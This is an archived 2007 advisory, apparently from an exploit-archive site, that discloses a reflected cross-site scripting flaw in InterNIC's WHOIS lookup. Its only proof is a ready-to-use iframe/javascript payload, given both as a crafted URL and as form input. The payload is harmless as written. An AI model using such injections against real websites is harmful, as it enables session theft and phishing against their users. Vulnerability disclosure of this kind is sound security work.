Home / os / solaris

internic-xss.txt

Posted on 31 July 2007

# Title : InterNIC WHOIS lookup XSS exploit # Description : InterNIC has a WHOIS lookup function wich suffers from an XSS vulnerability # Author : Tosser # Contact : ht7015@gmail.com # Proof : http://reports.internic.net/cgi/whois?whois_nic=%3Ciframe%20src=%22javascript:alert('XSS')%22%3E&type=domain or go to http://www.internic.net/, then choose Whois from the menu, and type <iframe src="javascript:alert('XSS')"> in the inputbox and click Submit.

 

TOP